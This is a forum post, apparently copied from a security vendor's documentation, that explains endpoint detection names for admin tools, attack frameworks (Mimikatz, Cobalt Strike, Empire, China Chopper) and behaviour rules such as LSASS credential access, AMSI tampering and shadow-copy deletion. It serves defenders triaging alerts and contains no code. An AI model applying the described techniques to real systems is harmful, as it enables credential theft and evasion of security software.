Home Upgrade Search Memberlist Extras Hacker Tools Award Goals Help Wiki Follow Contact

HF Rulez the UniverseHF Rulez the Universe
Sigma
View all of my HELPFUL THREADS!!
Malware PUA Overview Metasploit Hack

In-depth Malware Descriptions

Posted 05-04-2021, 12:55 AM
Potentially Unwanted Applications

App/IObitUn-A (PUA_IMPAIR_IOBIT_UNINSTALLER) + App/IObitUnlo-A (PUA_IMPAIR_IOBIT_UNLOCKER)
IObit's Uninstaller (https://www.iobit.com/en/advanceduninstaller.php) can be used to force remove programs from systems. This is a legitimate administrator application, but it has been used maliciously by threat actors to disable or remove security and logging software.

App/NirCmd-Gen (PUA_EXECUTION_NIRCMD)
NirSoft's NirCmd (https://www.nirsoft.net/utils/nircmd.html) is a small but powerful administrator tool to perform useful tasks on a device from the command line. With NirCmd it's possible to modify registry keys, open and close the CD-ROM drive, manipulating the clipboard, and restarting services. As an administrative tool, it may exist legitimately within the network, however, if it is not a tool that you are familiar with or actively using it's possible that a threat actor may be employing its features.

App/Metasplt-F (ATK_METASPLOIT)
The Metasploit Framework (https://www.metasploit.com/) is commonly used by penetration testers to exploit vulnerabilities, deploy stagers to gain remote control, and drop payloads designed to test the abilities of security software. As a free and open-source penetration testing application it is often used by pen-testers to explore an environment's security. If you are performing a penetration test currently, you should check the detections with the tester to ensure they are related. If you are not currently performing a penetration test, you should investigate the alerts immediately.

App/PrcHacker-A (PUA_IMPAIR_PROCESS_HACKER)
Process Hacker (https://processhacker.sourceforge.io/) is a tool similar to Microsoft's Task Manager or Process Explorer. It is a very powerful administrator tool allowing users to find file hooks, network connections, disk usage, and more. It can also be used to dump the memory of a running process and to kill unprotected security software. Process Hacker has been seen in the advanced stages of attacks, where it is used by an attacker with remote access (eg over RDP) to terminate security and logging software prior to deploying a malicious payload, often ransomware. Its unaccounted presence is a strong indication that an active, ongoing, coordinated attack is taking place.

App/PsKill-Gen (PUA_IMPAIR_PSKILL)
PsKill (https://docs.microsoft.com/en-us/sysinte...ads/pskill) is an administrative tool created by System Internals, now part of Microsoft. The tool can be used by administrators to kill local or remote processes. In the wrong hands, this tool can be used to disable security or logging software prior to deploying a malicious payload. Its unaccounted presence is a strong indication that an active, ongoing, coordinated attack is taking place.

App/PsExec-Gen (PUA_EXECUTION_PSEXEC)
PsExec (https://docs.microsoft.com/en-us/sysinte...ads/psexec) is an administrative tool created by System Internals, now part of Microsoft. The tool can be used by administrators to execute processes locally or remotely, as administrator or as a system account. It is often used for installing applications or running scripts across multiple devices. In the wrong hands, these features can be used to deploy malware rapidly across an environment.

App/MimKatz-A (ATK_MIMIKATZ)
Mimikatz (https://github.com/gentilkiwi/mimikatz/wiki) is a very powerful tool that can be used to extract plain-text passwords, certificates, Kerberos tickets, and more. This tool is commonly deployed by penetration testers and as such may be used legitimately. If, however, you are not performing a penetration test at this time, it is highly likely that an active adversary may be deploying it. Since Mimikatz can be used to obtain administrator credentials from devices it is seen in almost all modern attacks to enable the threat actor to move laterally to other devices, disable security or logging software, or deploy payloads with higher permission to cause greater damage.

App/Equation-AB (PUA_LATERAL_SMBTOUCH_NETWORK_CAPTURE)
How Abused: Part of the Equation Group attack kit, used in conjunction with Eternal Blue.
Category: Network Reconnaissance
Also: App/Equation-AA



AMSI Detections

AMSI/BloodH-B (ACTIVE_ATK_MISC)
Bloodhound (https://bloodhound.readthedocs.io/en/latest/index.html) is a tool used by both blue and red teams in order to gain a deeper understanding of privilege relationships in an Active Directory environment. For example: The active adversary was able to get hack into Bob (who is a member of Server Admin). But the active adversary would like to target an account that belongs to the Domain Admins group. This tool can show diagrammatically where the active adversary should laterally move in order to obtain the higher privileges.

AMSI/Mimikatz (ACTIVE_ATK_CREDS)
Mimikatz (https://github.com/gentilkiwi/mimikatz/wiki) is a very powerful tool that can be used to extract plain-text passwords, certificates, Kerberos tickets, and more. This tool is commonly deployed by penetration testers and as such may be used legitimately. If, however, you are not performing a penetration test at this time, it is highly likely that an active adversary may be deploying it. Since Mimikatz can be used to obtain administrator credentials from devices it is seen in almost all modern attacks to enable the threat actor to move laterally to other devices, disable security or logging software, or deploy payloads with higher permission to cause greater damage.

ATK/Cobalt (ATK_COBALTSTRIKE)
AMSI/Cobalt-A is a runtime detection for Cobalt Strike (https://www.cobaltstrike.com/). This is a penetration testing tool and as such may be used legitimately. If, however, you are not performing a penetration test at this time, it is highly likely that an active adversary is deploying it. For example, the Conti group (as well as many others) are known to use these tools during their attacks.

HPmal/MSFPShl (ACTIVE_ATK_COBALTSTRIKE)
HPmal/MSFPShel is a runtime detection for Metasploit Framework's (https://www.metasploit.com/) PowerShell stagers, it can also detect Cobalt Strike (https://www.cobaltstrike.com/) stagers too. These are penetration testing tools and as such may be used legitimately. If, however, you are not performing a penetration test at this time, it is highly likely that an active adversary is deploying them. For example, the Conti group (as well as many others) are known to use these tools during their attacks.

HPmal/WMIPOW-? (ACTIVE_PAYLOAD_MINER)
Powershell scripts related to coin miners called from WMI.
WMI is a native Windows utility used by administrators to automate tasks and remotely manage systems.
This detection indicates the malware has its persistence in WMI DB.
Note: Manual intervention is required to remove these malicious scripts - investigate the WMI DB entries, identify, and then remove.

Mal/Chopper-A (ATK_WEBSHELL)
Commonly called "China Chopper", it is a small web file created in aspx, php, jsp, and others that have been around for about 10 years. It is a very simple web file designed to accept an HTTP POST command and execute them directly on the server. Because of its size and flexibility, it is a very stealthy tool. Most recently used during the Exchange exploits March 2021. China Chopper is used to obtain a reverse shell, file access, and process execution. https://www.zdnet.com/article/hafniums-c...backdoors/

ATK/Empire-D (ATK_POWERSHELL_EMPIRE)
Powershell Empire (https://www.powershellempire.com/) is a collection of tools used post-exploitation. The toolkit is sometimes used by penetration testers and as such may be used legitimately. If, however, you are not performing a penetration test at this time, it is highly likely that an active adversary is deploying them. Powershell Empire allows them to communicate securely to devices, maintain persistence, and deploy additional modules such as mimikatz (https://github.com/gentilkiwi/mimikatz/wiki) or keyloggers. Ransomware such as Lockbit has been known to use modified Powershell Empire scripts to remotely control devices and deploy the payloads.

Troj/Meter-F (ATK_METASPLOIT)
Meterpreter (https://www.offensive-security.com/metas...terpreter/) is an extension written for the Metasploit Framework (https://www.metasploit.com/). It is commonly used by penetration testers to perform in-memory injections and establish a stager on a target device. As a free and open-source penetration testing application it is often used by pen-testers to explore an environment's security. If you are performing a penetration test currently, you should check the detections with the tester to ensure they are related. If you are not currently performing a penetration test, you should investigate the alerts immediately. Attacks using modified Meterpreter tools include those by the Conti group.



HMPA Detections

Dynamic Shellcode/HeapHeapProtect (ACTIVE_STAGING)
Dynamic Shellcode or HeapHeapProtect detects code running in dynamic memory, in RUNDLL32.EXE and REGSVR32.EXE, and prevents it from manipulating other dynamic memory. This proactively helps against many backdoor tools, trojans, and ransomware families. Seeing these alerts normally means that an active adversary is on the device attempting to attack it or other systems within your network.

AMSIGuard
An AMSIGuard detection will occur if a process attempts to disable the AMSI (https://docs.microsoft.com/en-us/windows...ace-portal) integration of Windows. AMSI, the anti-malware scanning interface allows security vendors to see and scan executing obfuscated or encrypted code just before it runs. Recent ransomware attacks have attempted to disable AMSI to lessen the chance of security software detecting their activity before deploying the payloads.

CredGuard
CredGuard detections are triggered when an unauthorized process is attempting to access the LSASS memory on a device. This area of memory is used to store the credentials, certificates, keys, and tokens of users.

HollowProcess (ACTIVE_HOLLOWING)
HollowProcess detection will fire up when a process is subjected to a "process hollowing technique". This is a technique wherein a trusted application - like explorer.exe or svchost.exe - is loaded on the system solely to act as a container for hostile code. A hollow process is typically created in a suspended state then its memory is unmapped and replaced with malicious code. Similar to code injection, execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis.



Behaviour Detections

Exec_1a (MITRE ATT&CK T1059)
Exec_1c (MITRE ATT&CK T1059)
Exec_5a (MITRE ATT&CK T1197)
Exec_6a (MITRE ATT&CK T1059.001) (ACTIVE_POWERSHELL_DOWNLOAD)

Malicious PowerShell activity. Adversaries can make use of PowerShell to perform malicious actions against an organization, some common activities include - performing reconnaissance that will reveal potential targets (servers, crown jewels, etc.), or execute malicious commands to continue their attack chain. An interesting behavior of adversaries is to make use of PowerShell to download and execute malicious executable in memory, they would like to achieve this to by-pass anti-malware checking on files written/read from the disk.

Some examples of when this rule likely to fire up:
  • PowerShell commands that will try to download and execute modules related to crypto-mining attacks.
  • PowerShell commands launched using macros from a malicious Excel file.

Exec_7a (MITRE ATT&CK T1220)
Exec_9a (MITRE ATT&CK T1117)
Exec_12b (MITRE ATT&CK T1086)
Exec_13a
Exec_17a (ACTIVE_POWERSHELL_REMOTEEXECUTION)
This detection will fire up to protect the endpoint from PowerShell dynamic execution in which the code that is intended to be executed is from open-source repositories like - github and pastebin.

Exec_21a (ACTIVE_POWERSHELL_LEMONDUCK)
A rule to block the Lemon Duck coin miner -- which is important for older Windows endpoints & servers that do not support AMSI scanning at the OS level.

Exec_27a (T1059.001)(ACTIVE_ATK_COBALTSTRIKE)
Adversaries may abuse PowerShell commands and scripts for execution.
A common scenario would be - this rule firing up when trying to run a Cobalt activity.

Exec_28a (MITRE ATT&CK T1059.001)(ACTIVE_PAYLOAD_MINER)
Malicious PowerShell activity. Read Exec_6a (above) for a general intro on how adversaries can abuse PowerShell. This particular rule will fire for PowerShell commands that will try to download and execute modules related to crypto-mining attacks.
Note: Interestingly, in most cases -  Exec_6a rule with fire up before Exec_28a on a single machine.

Persist_12a

Evade_7a
Evade_8a
Evade_23a (MITRE ATT&CK T1218.011)(ACTIVE_ATK_KOADIC)

Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor the execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.

This detection will trigger and block if a rundll32 process will run a malicious code (exe/dll) that belongs to the Koadic toolset. Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire.

Lateral_1b (MITRE ATT&CK T1105)
LOLBIN - Living off the Land Binary. Usage of Windows Binaries to hide malicious activity

Lateral_2a!s

C2_11a (T1071.001)(ACTIVE_C2_LOLBIN)

C2_12a!s (T1071.001)(ACTIVE_C2_PAYLOAD)
Adversaries will connect to their command-and-control(C2) servers to get additional commands for the remote systems to execute. This rule will fire up if the detected C2 communications are making use of Web Protocols (HTTP/S). One of the main reasons why they utilize this technique is that - most organizations are allowing HTTP/S traffic in their organizations (browsing and doing business on the internet).

Impact_2a!s (MITRE ATT&CK T1490)
Could indicate the use of VSSAdmin to delete or manipulate volume shadow copies, a Microsoft service that allows system rollback. Changing the size of volume shadow copies to something very small can have a similar effect to deleting (Ryuk ransomware used this successfully).